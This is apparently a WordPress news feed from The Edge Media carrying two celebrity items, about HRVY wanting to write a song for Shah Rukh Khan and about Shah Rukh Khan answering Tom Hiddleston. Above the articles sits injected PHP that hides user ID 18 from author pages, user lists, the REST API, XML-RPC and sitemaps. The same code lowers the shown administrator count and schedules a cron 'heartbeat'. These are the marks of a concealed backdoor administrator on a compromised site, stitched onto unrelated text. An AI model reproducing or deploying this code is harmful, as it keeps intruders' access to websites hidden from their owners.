add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post HRVY, the famous actor and singer wishes to write a song for SRK appeared first on The Edge Media.
]]>All of 22, this young hunk has garnered an incredible online fan-following around the globe. When asked what he thinks about this frenzy, he humbly replies, “Never in a million years did I expect to have this many people support me and my music. I’ve always wanted to travel the world and write music but I always thought it was going to be more of a hobby than my actual career. Now, I can say that being an artiste is my full-time job. If I’m honest it’s hard even calling it a job because of how incredible and how lucky I am to be doing it”.
Talking about the new dance track, HRVY says, “I wrote this song a few months ago, right in the middle of the pandemic. I remember walking into the studio wanting to write a super slow acoustic ballad. I think we even started writing one, but somehow we came out with probably my most upbeat dance club track ever. I believe in accidents in music, so, I thought let’s just roll with it! I think we all need a song that makes us want to dance right now”.
While chatting about his acting dreams, he revealed that he was more than ready to even star in a desi Bollywood film and would love to work on a song for the ‘legend’ Shah Rukh Khan. “I would love to act in a Bollywood movie! When I last visited I heard about the legend Shah Rukh Khan! So if he ever needs a song for one of his movies, I’m here!” While his next trip to India may take a tad longer owing to the Covid-19 restrictions, he sent love to his fans saying, “I love you guys, stay safe. I can’t wait to return to India. I loved it the first time and I can’t wait to come back, meet, and make more memories with you guys”.
The post HRVY, the famous actor and singer wishes to write a song for SRK appeared first on The Edge Media.
]]>The post Shah Rukh Khan reciprocates Tom Hiddleston’s love appeared first on The Edge Media.
]]>You are kind, God of Mischief… hope there’s no mischief behind this claim though. Lots of love Tom and can’t wait to binge Loki!!! Starting now- Ep 1,” Shah Rukh Khan wrote in a tweet, mentioning Tom Hiddleston.

In the video, for the word Loki, Tom came up with ‘me’; for Thor, he said ‘brother’; for Chris, he replied ‘Hemsworth’. The word(s) that Tom associated with India were ‘Shah Rukh Khan’. When asked to associate a word with Bollywood, Tom said, “Am I allowed to say Shah Rukh Khan again? Shah Rukh Khan again
When asked to name an Indian city, he said, “Chennai. My akka (sister) lives there. She used to live there. And I have been there a few times. Chennai is great!”
Loki released its first episode on Disney+ Hotstar in India on Wednesday. The show also stars Owen Wilson and it follows the adventures of Loki after he was set loose during the events of the time heist in Avengers: Endgame.
The post Shah Rukh Khan reciprocates Tom Hiddleston’s love appeared first on The Edge Media.
]]>